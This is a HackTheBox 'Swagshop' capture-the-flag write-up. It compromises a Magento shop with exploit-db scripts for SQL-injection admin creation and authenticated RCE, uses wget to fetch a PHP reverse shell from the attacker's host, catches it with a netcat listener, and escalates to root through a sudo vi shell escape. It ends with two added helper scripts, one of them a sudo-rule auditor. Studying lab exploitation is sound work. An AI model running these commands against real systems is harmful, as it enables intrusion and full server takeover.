Hackthebox – Swagshop

As with any machine, we start with a portscan and find out that only ports 22 and 80 are open.

root@kalivm:~/swagshop# nmap -A -oN fullscan-A 10.10.10.140
Nmap scan report for 10.10.10.140
Host is up (0.016s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/17%OT=22%CT=1%CU=42455%PV=Y%DS=2%DC=T%G=Y%TM=5D57C53
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10E%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   16.82 ms 10.10.12.1
2   17.14 ms 10.10.10.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 17 11:13:21 2019 -- 1 IP address (1 host up) scanned in 23.08 seconds

When browsing to the web server, it appears to be a Magento eCommerce site.
Swagshop website
So looking in searchsploit for known Magento exploits is the first step.

root@kalivm:~/swagshop# searchsploit magento
------------------------------------------ ----------------------------------------
 Exploit Title                            |  Path
                                          | (/usr/share/exploitdb/)
------------------------------------------ ----------------------------------------
Magento 1.2 - '/app/code/core/Mage/Admin/M| exploits/php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminht| exploits/php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross| exploits/php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / | exploits/php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Rem| exploits/php/webapps/37811.py
Magento Server MAGMI Plugin - Multiple Vul| exploits/php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remo| exploits/php/webapps/35052.txt
Magento eCommerce - Local File Disclosure | exploits/php/webapps/19793.txt
Magento eCommerce - Remote Code Execution | exploits/xml/webapps/37977.py 
eBay Magento 1.9.2.1 - PHP FPM XML eXterna| exploits/php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cro| exploits/php/webapps/38651.txt
------------------------------------------ ----------------------------------------

After some errors, I found out that the admin panel required by this exploit (37977.py, the unauthenticated "Magento eCommerce - Remote Code Execution" entry) is not under /admin, but under index.php/admin.

admin_panel

The script abuses a SQL injection in the admin Cms_Wysiwyg directive endpoint to insert a new admin user. After replacing the target with the actual URL, changing target_url to include index.php, and taking the username and password from the command line, I ran the slightly modified exploit and got an account.

root@kalivm:~/swagshop# cat 37977.py 
#!/usr/bin/env python2
#Thanks to
# Zero cool, code breaker ICA, Team indishell, my father , rr mam, jagriti and DON  
import requests
import base64
import sys

target = sys.argv[1]
---snip---
# the admin panel on this box is served via index.php, not /admin
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
---snip---
# argv[2] is used for both the username and the password of the new admin
query = q.replace("\n", "").format(username=sys.argv[2], password=sys.argv[2])
---snip---
if r.ok:
 print "WORKED"
 # .format() binds to the trailing "" only, so {0} is printed literally (see output below)
 print "Check {0}/admin with creds " + sys.argv[2] + ":"+ sys.argv[2] + "".format(target)
else:
 print "DID NOT WORK"
root@kalivm:~/swagshop# ./37977.py http://10.10.10.140 sedje
WORKED
Check {0}/admin with creds sedje:sedje

So now we should be able to log in using the user/password combination.

admin_login_successful

After some research I found a page with a simple explanation of how to create a backdoor. Although interesting, the /downloader URL appeared to have been removed, so this was not a fruitful way of exploiting it. I then spent some time searching and fiddling with other interesting topics, such as this one about 'FrogHopper'. Parts of it worked

froghopper was partially working

But other elements I could not get to work. I was kinda lost, so I decided to ask on the HTB Discord for a nudge and got pointed back to the searchsploit output above. Looking at it again, one authenticated exploit stood out immediately: "Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution" (37811.py), which is usable now that we have admin credentials.

It required only minimal modifications: you have to set the username and password on lines 32 and 33.

# Config.
username = 'sedje'
password = 'sedje'

After those were set, the first thing was to try running the exploit:

/swagshop# python 37811.py http://10.10.10.140/index.php/admin/ "uname -a" 
Traceback (most recent call last):
  File "37811.py", line 69, in <module>
    tunnel = tunnel.group(1)
AttributeError: 'NoneType' object has no attribute 'group'

Looking at the offending line, a regular expression searches the response for the 'src=' attribute of the dashboard chart image:

tunnel = re.search("src=\"(.*)\?ga=", request.read())
tunnel = tunnel.group(1)

re.search() returns None when there is no match, hence the AttributeError on .group(1). The request just before line 69 is an Ajax call to the dashboard's orders tab for a certain period, and Magento only renders the chart image (whose src is the dashboard/tunnel URL, admin key included, that the exploit later sends its serialized payload to) when that period actually contains orders. Trying the request with the various period options in a Python console showed that the 1y (YTD) period was the one that returned the chart:

>>> request = br.open(url + 'block/tab_orders/period/1y/?isAjax=true', data='isAjax=true&form_key=' + key)
>>> request.read()
'<div style="margin:20px;">\n    <p class="switcher a-right" style="padding:5px 10px;">Select Range:\n    <select name="period" id="order_orders_period" onchange="changeDiagramsPeriod(this);">\n                                <option value="24h" >Last 24 Hours</option>\n                                <option value="7d" >Last 7 Days</option>\n                                <option value="1m" >Current Month</option>\n                                <option value="1y"  selected="selected">YTD</option>\n                                <option value="2y" >2YTD</option>\n            </select></p><br/>\n            <p style="width:587px;height:300px; margin:0 auto;"><img src="http://10.10.10.140/index.php/admin/dashboard/tunnel/key/b02444e1205c5c4436a14b8ada569b5b/?ga=YTo5OntzOjM6ImNodCI7czoyOiJsYyI7czozOiJjaGYiO3M6Mzk6ImJnLHMsZjRmNGY0fGMsbGcsOTAsZmZmZmZmLDAuMSxlZGVkZWQsMCI7czozOiJjaG0iO3M6MTQ6IkIsZjRkNGIyLDAsMCwwIjtzOjQ6ImNoY28iO3M6NjoiZGI0ODE0IjtzOjM6ImNoZCI7czoxMjoiZTpBQUFBQUFxcUFBIjtzOjQ6ImNoeHQiO3M6MzoieCx5IjtzOjQ6ImNoeGwiO3M6NTM6IjA6fDAxLzIwMTl8MDIvMjAxOXwwMy8yMDE5fDA1LzIwMTl8MDcvMjAxOXwxOnwwfDF8MnwzIjtzOjM6ImNocyI7czo3OiI1ODd4MzAwIjtzOjM6ImNoZyI7czoyMjoiMjUsMzMuMzMzMzMzMzMzMzMzLDEsMCI7fQ%253D%253D&h=017016eb2e41b7db0b569962bc2ae4a6" alt="chart" title="chart" /></p>\n    </div>\n'
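The lookup the exploit performs can be made robust against the no-orders case instead of hard-coding one period. The following is an added example, not code from the page or from 37811.py: it extracts the tunnel URL and admin key from a dashboard tab response and walks through the period options until one renders the chart. The two HTML samples are constructed (trimmed from the response above), and fetch_tab is a caller-supplied function; with mechanize it would wrap the br.open(...).read() call shown above.

```python
import re

# Constructed sample responses for the dashboard orders tab, trimmed from the
# Magento 1 markup shown in the console output above. The first is what the
# tab returns when the selected period contains no orders; the second carries
# the chart <img> whose src is the dashboard/tunnel URL the exploit needs.
NO_DATA_HTML = (
    '<div style="margin:20px;"><p class="switcher a-right">Select Range: '
    '<select name="period" id="order_orders_period"></select></p><br/>'
    '<p class="a-center">No Data Found</p></div>'
)
CHART_HTML = (
    '<div style="margin:20px;"><p class="switcher a-right">Select Range: '
    '<select name="period" id="order_orders_period"></select></p><br/>'
    '<p style="width:587px;height:300px; margin:0 auto;"><img src="http://10.10.10.140'
    '/index.php/admin/dashboard/tunnel/key/b02444e1205c5c4436a14b8ada569b5b/'
    '?ga=YTo5OntzOjM6ImNodCI7czoyOiJsYyI7fQ%253D%253D&h=017016eb2e41b7db0b569962bc2ae4a6" '
    'alt="chart" title="chart" /></p></div>'
)

# Anchored on the tunnel path rather than a greedy src="(.*)", so an unrelated
# <img> elsewhere in the page cannot swallow the match.
TUNNEL_RE = re.compile(r'src="([^"]*?/dashboard/tunnel/key/([0-9a-f]+)/)\?ga=')

# Period values offered by the dashboard switcher, in the order shown on the page.
PERIODS = ("24h", "7d", "1m", "1y", "2y")


def extract_tunnel(html):
    """Return (tunnel_url, admin_key) from a dashboard tab response, or None
    when no chart was rendered (no orders fell inside the selected period)."""
    m = TUNNEL_RE.search(html)
    if m is None:
        return None
    return m.group(1), m.group(2)


def find_tunnel(fetch_tab, periods=PERIODS):
    """Walk the period options until one renders the chart.

    fetch_tab(period) must return the body of
    block/tab_orders/period/<period>/?isAjax=true as a str; with mechanize
    that is br.open(url + ..., data=...).read() from the session above.
    Returns (period, tunnel_url, admin_key).
    """
    for period in periods:
        found = extract_tunnel(fetch_tab(period))
        if found is not None:
            return (period,) + found
    raise RuntimeError("no dashboard period rendered the chart; the shop has no orders")


def fake_fetch(period):
    """Offline stand-in for the Ajax call: only YTD and 2YTD contain orders."""
    return CHART_HTML if period in ("1y", "2y") else NO_DATA_HTML


if __name__ == "__main__":
    period, url, key = find_tunnel(fake_fetch)
    print("period=%s key=%s\ntunnel=%s" % (period, key, url))
```

Against a real target, replace fake_fetch with a function that performs the authenticated Ajax request; the RuntimeError is the case the original exploit turned into an AttributeError.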

Since the box keeps getting reset, I ran the first exploit again to make sure my account was still present; after that the second script completed without issues:

root@kalivm:~/swagshop# ./37977.py http://10.10.10.140 sedje
WORKED
Check {0}/admin with creds sedje:sedje
root@kalivm:~/swagshop# python 37811.py http://10.10.10.140/index.php/admin/ "uname -a" 
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Seems like we've got working RCE now! The next step is to get a reverse shell across. The stock PHP reverse shell is more than sufficient, so I modified it to contain the right IP and port and, for ease of use, renamed it sedje.php. Then I ran the 37811 script again with a wget that fetches it from a Python web server on my machine:

root@kalivm:~/swagshop# python 37811.py http://10.10.10.140/index.php/admin/ "wget -O /var/www/html/shell/sedje.php http://10.10.12.106:8000/sedje.php"

And meanwhile, in the other terminal

root@kalivm:~/swagshop# python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.140 - - [29/Aug/2019 10:41:35] "GET /sedje.php HTTP/1.1" 200 -

Bingo, the shell uploaded. Now all we need to do is start a listener and request sedje.php from the web server.

shell_uploaded
After setting up the listener and opening the PHP file in the browser, the shell connects back as www-data and we can look for the user's home directory containing the flag.

root@kalivm:~/swagshop# nc -nvlp 1234
Listening on [0.0.0.0] (family 2, port 1234)
Connection from 10.10.10.140 32838 received!
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 01:05:25 up 36 min,  0 users,  load average: 0.77, 1.11, 0.66
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls /home
haris
$ cat /home/haris/user.txt
a448877<NOFLAG>5e5ddf9f90aefbac8

Privilege escalation

After browsing through the system and looking at various configuration settings and files, I found one thing that was pretty interesting: a mistake in the sudo configuration!

$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

www-data may run vi as root, without a password, on any path matching /var/www/html/* (the file does not even have to exist). Since vi(m) can spawn a shell with :!/bin/bash, and that shell inherits the root privileges of the editor, this misconfiguration is enough to become root and read the flag. The terminal warnings below appear because the reverse shell has no tty; spawning one first with python -c 'import pty; pty.spawn("/bin/bash")' avoids them, but the escape works regardless.

$ sudo /usr/bin/vi /var/www/html/sedje
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal

E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
    builtin_amiga
    builtin_beos-ansi
    builtin_ansi
    builtin_pcansi
    builtin_win32
    builtin_vt320
    builtin_vt52
    builtin_xterm
    builtin_iris-ansi
    builtin_debug
    builtin_dumb
defaulting to 'ansi'
~
~
~
~
:!/bin/bash

id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
c2b087d6<NOFLAG>a3b86a130ac56721

   ___ ___
 /| |/|\| |\
/_| ´ |.` |_\           We are open! (Almost)
  |   |.  |
  |   |.  |         Join the beta HTB Swag Store!
  |___|.__|       https://hackthebox.store/password

                   PS: Use root flag as password!
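Finding this rule by eye works on one box; across a fleet you want the check automated. The following is an added example, not part of the original write-up: it parses the rule section of `sudo -l` output and flags commands that can spawn a shell (the GTFOBins pattern that vi falls under), wildcard arguments, and NOPASSWD on anything already flagged. The sudo -l text is the one recorded above plus one harmless constructed rule, and the set of shell-escape binaries is an illustrative subset, not a complete list.

```python
import os
import re

# Constructed sample: the `sudo -l` output recorded above, plus one harmless
# rule added so the checker has something to leave alone.
SUDO_L_OUTPUT = r"""Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
    (root) /usr/bin/systemctl restart apache2
"""

# Illustrative subset of binaries that can hand their caller a shell
# (see GTFOBins); vi/vim do it with :!/bin/bash as used above.
SHELL_ESCAPE_BINS = {"vi", "vim", "view", "nano", "less", "more", "man", "find", "awk", "ed"}

# "(runas) [TAG: ...] /path/to/cmd args" as printed by `sudo -l`.
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(\S+)(.*)$")


def parse_sudo_l(text):
    """Return the rule entries of `sudo -l` output as dicts with
    runas, tags, cmd and args. Several commands may share one line,
    comma separated; those inherit the line's runas user and tags."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        runas, tags = None, ()
        for part in line.split(","):
            m = RULE_RE.match(part)
            if m:
                runas = m.group(1)
                tags = tuple(t.rstrip(":") for t in m.group(2).split())
                cmd, args = m.group(3), m.group(4)
            else:
                cmd, _, args = part.strip().partition(" ")
            rules.append({"runas": runas, "tags": tags, "cmd": cmd, "args": args.strip()})
    return rules


def assess(rule):
    """List the problems with one rule; an empty list means nothing flagged."""
    findings = []
    base = os.path.basename(rule["cmd"])
    if rule["cmd"] == "ALL":
        findings.append("ALL: unrestricted commands as %s" % rule["runas"])
    if base in SHELL_ESCAPE_BINS:
        findings.append("%s can spawn a shell running as %s" % (base, rule["runas"]))
    if "*" in rule["args"]:
        findings.append("wildcard argument %r matches any path, including ones with .. components"
                        % rule["args"])
    if "NOPASSWD" in rule["tags"] and findings:
        findings.append("NOPASSWD: exploitable from any shell as the user, no password needed")
    return findings


def audit(text):
    """Return [(rule, findings)] for every rule that has at least one finding."""
    results = []
    for rule in parse_sudo_l(text):
        findings = assess(rule)
        if findings:
            results.append((rule, findings))
    return results


if __name__ == "__main__":
    for rule, findings in audit(SUDO_L_OUTPUT):
        print("(%s) %s %s" % (rule["runas"], rule["cmd"], rule["args"]))
        for finding in findings:
            print("  - " + finding)
```

The fix on the defensive side is not to tighten the wildcard but to remove the need for it: files under /var/www/html should be writable by the account that maintains them, and if root-owned files really must be edited, the rule should use sudoedit, which copies the file and runs the editor as the invoking user, so a :! escape yields a www-data shell rather than root.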
